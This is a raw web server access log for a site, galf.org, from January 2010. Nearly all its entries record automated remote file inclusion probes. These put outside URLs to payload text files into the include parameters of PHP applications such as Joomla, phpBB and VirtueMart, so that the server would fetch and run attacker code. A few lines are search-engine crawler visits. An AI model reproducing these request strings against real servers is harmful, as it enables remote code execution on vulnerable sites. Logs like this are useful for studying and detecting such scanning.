209.172.33.230 - - [17/Jan/2010:20:11:16 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [17/Jan/2010:20:11:16 -0800] "GET /?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [17/Jan/2010:20:11:16 -0800] "GET /logs/?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:20:11:32 -0800] "GET /?sourcedir=http://acolmi.org/images/save.gif?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:20:11:32 -0800] "GET /logs/access_090921.log/?sourcedir=http://acolmi.org/images/save.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:20:11:32 -0800] "GET /logs/?sourcedir=http://acolmi.org/images/save.gif?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:11:51 -0800] "GET /?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:11:51 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:11:51 -0800] "GET /logs/?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:12:14 -0800] "GET /?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:12:14 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:12:14 -0800] "GET /logs/?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [17/Jan/2010:20:12:53 -0800] "GET /error.php?error=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [17/Jan/2010:20:12:53 -0800] "GET /logs/error.php?error=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.58.163.53 - - [17/Jan/2010:20:13:14 -0800] "GET /logs/access.log/?phpbb_root_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.58.163.53 - - [17/Jan/2010:20:13:14 -0800] "GET /?phpbb_root_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
207.58.163.53 - - [17/Jan/2010:20:13:14 -0800] "GET /logs/?phpbb_root_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
207.58.163.53 - - [17/Jan/2010:20:13:14 -0800] "GET /?phpbb_root_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
207.58.163.53 - - [17/Jan/2010:20:13:15 -0800] "GET /logs/?phpbb_root_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
207.58.163.53 - - [17/Jan/2010:20:13:15 -0800] "GET /logs/access.log/?phpbb_root_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:13:27 -0800] "GET /?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:13:27 -0800] "GET /logs/?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:13:27 -0800] "GET /logs/access_090615.log/?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:13:33 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:13:37 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [17/Jan/2010:20:13:41 -0800] "GET /logs/access.log/error.php?error=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [17/Jan/2010:20:13:49 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [17/Jan/2010:20:13:49 -0800] "GET /logs/?sourcedir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [17/Jan/2010:20:13:49 -0800] "GET /?sourcedir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:20:13:51 -0800] "GET /logs/?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:20:13:51 -0800] "GET /?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:20:13:52 -0800] "GET /logs/access_090921.log/?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:20:14:00 -0800] "GET /?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:20:14:00 -0800] "GET /logs/?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:20:14:00 -0800] "GET /logs/access_090921.log/?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:20:14:01 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://acolmi.org/images/save.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:20:14:03 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:20:14:03 -0800] "GET /?sourcedir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:20:14:03 -0800] "GET /logs/?sourcedir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:14:07 -0800] "GET /?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:14:08 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:14:08 -0800] "GET /logs/?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:14:52 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [17/Jan/2010:20:15:35 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [17/Jan/2010:20:15:47 -0800] "GET /error.php?error=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [17/Jan/2010:20:15:47 -0800] "GET /logs/error.php?error=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:20:15:50 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:20:15:50 -0800] "GET /?sourcedir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:20:15:50 -0800] "GET /logs/?sourcedir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [17/Jan/2010:20:15:52 -0800] "GET /logs/access.log%20%20/error.php?error=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [17/Jan/2010:20:16:39 -0800] "GET /logs/access_090615.log/?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [17/Jan/2010:20:16:39 -0800] "GET /logs/access_090921.log/?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [17/Jan/2010:20:16:54 -0800] "GET /error.php?error=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [17/Jan/2010:20:16:54 -0800] "GET /logs/error.php?error=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [17/Jan/2010:20:16:58 -0800] "GET /logs/access.log/error.php?error=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [17/Jan/2010:20:17:05 -0800] "GET /error.php?error=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [17/Jan/2010:20:17:14 -0800] "GET /logs/error.php?error=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.59.90 - - [17/Jan/2010:20:17:15 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [17/Jan/2010:20:17:20 -0800] "GET /logs/access.log/error.php?error=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [17/Jan/2010:20:17:22 -0800] "GET /logs/access_090907.log/?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.164 - - [17/Jan/2010:20:17:31 -0800] "GET /logs//write.php?dir=http://www.noin9191.com/ams/ammember/rfi1.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.galf.org"
209.126.254.164 - - [17/Jan/2010:20:17:32 -0800] "GET /write.php?dir=http://www.noin9191.com/ams/ammember/rfi1.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:20:18:02 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:20:18:09 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:20:18:42 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:20:18:45 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [17/Jan/2010:20:18:58 -0800] "GET /labia/ HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
110.45.136.177 - - [17/Jan/2010:20:21:47 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
110.45.136.177 - - [17/Jan/2010:20:21:47 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
110.45.136.177 - - [17/Jan/2010:20:21:47 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.172.33.230 - - [17/Jan/2010:20:22:17 -0800] "GET /logs/access.log/?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.136.177 - - [17/Jan/2010:20:22:24 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.136.177 - - [17/Jan/2010:20:22:25 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.136.177 - - [17/Jan/2010:20:22:25 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.59.90 - - [17/Jan/2010:20:22:34 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [17/Jan/2010:20:22:43 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:20:25:27 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://bdautosales.com/images/builders/build.url??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
189.72.28.14 - - [17/Jan/2010:20:25:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://bdautosales.com/images/builders/build.url??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
64.1.16.10 - - [17/Jan/2010:20:25:30 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://scaner.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.1.16.10 - - [17/Jan/2010:20:25:30 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://scaner.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.1.16.10 - - [17/Jan/2010:20:25:30 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://scaner.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:20:25:31 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://bdautosales.com/images/builders/build.url??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
70.85.154.98 - - [17/Jan/2010:20:25:48 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.85.154.98 - - [17/Jan/2010:20:25:48 -0800] "GET /logs/access_090727.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.85.154.98 - - [17/Jan/2010:20:25:48 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.1.16.10 - - [17/Jan/2010:20:25:52 -0800] "GET /logs/access_091123.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://scaner.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:26:05 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.223.143.131 - - [17/Jan/2010:20:26:05 -0800] "GET /logs/access.log%20%20//modules/xfsection/modify.php?dir_module=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.223.143.131 - - [17/Jan/2010:20:26:05 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.223.143.131 - - [17/Jan/2010:20:26:18 -0800] "GET /logs/access.log%20%20//modules/xfsection/modify.php?dir_module=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.223.143.131 - - [17/Jan/2010:20:26:18 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.223.143.131 - - [17/Jan/2010:20:26:21 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
70.85.154.98 - - [17/Jan/2010:20:26:22 -0800] "GET /logs/access_090727.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.85.154.98 - - [17/Jan/2010:20:26:22 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.85.154.98 - - [17/Jan/2010:20:26:22 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:27:17 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:27:17 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:27:17 -0800] "GET /logs/access_100111.log%20%20//modules/xfsection/modify.php?dir_module=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.214.100.152 - - [17/Jan/2010:20:27:28 -0800] "GET /logs/access_090720.log//index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.214.100.152 - - [17/Jan/2010:20:27:28 -0800] "GET /index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.214.100.152 - - [17/Jan/2010:20:27:28 -0800] "GET /logs//index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.214.100.152 - - [17/Jan/2010:20:27:28 -0800] "GET /index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.214.100.152 - - [17/Jan/2010:20:27:28 -0800] "GET /logs/access_090720.log//index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.214.100.152 - - [17/Jan/2010:20:27:28 -0800] "GET /logs//index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:27:32 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:27:32 -0800] "GET /logs/access_100111.log%20%20//modules/xfsection/modify.php?dir_module=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:27:32 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.250.252.242 - - [17/Jan/2010:20:30:07 -0800] "GET /logs/access_091109.log HTTP/1.1" 200 7313381 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
209.216.242.123 - - [17/Jan/2010:20:32:32 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
209.216.242.123 - - [17/Jan/2010:20:32:32 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
209.216.242.123 - - [17/Jan/2010:20:32:32 -0800] "GET /logs/access_100104.log///?_SERVER[DOCUMENT_ROOT]=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.28 - - [17/Jan/2010:20:33:02 -0800] "GET /labia/?S=A HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:33:58 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:33:58 -0800] "GET /logs/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:33:59 -0800] "GET /?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:34:01 -0800] "GET /logs/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:34:01 -0800] "GET /?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:34:01 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:34:09 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:34:09 -0800] "GET /?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:34:09 -0800] "GET /logs/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:34:53 -0800] "GET /logs/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:34:54 -0800] "GET /?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:34:54 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:35:12 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:35:12 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:35:23 -0800] "GET /?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:35:24 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:35:26 -0800] "GET /logs/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
